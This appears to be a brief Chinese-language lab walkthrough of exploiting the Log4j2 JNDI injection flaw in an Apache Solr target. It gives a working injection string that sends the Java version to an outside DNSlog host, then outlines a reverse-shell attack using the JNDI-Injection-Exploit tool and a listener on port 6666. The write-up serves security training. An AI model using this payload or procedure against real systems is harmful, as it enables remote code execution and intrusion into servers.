1.开启环境
2.访问靶场
3.可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的版本号!
可以访问到我们Java的版本,所以说明此处存在命令执行漏洞
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ir3n8l.dnslog.cn}
4.开始反弹shell
但是此处需要JNDI-Injection-Exploit
JNDI项目地址:
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
5.准备payload,并进行base64加密
6.将此payload复制到模版中,变为最终payload
在kali进行最终payload的运行,会获得一串有jndi生成的payload
7.监听6666端口
然后使用这条命令在log4j2中运行
8.最终会在监听处反弹回shell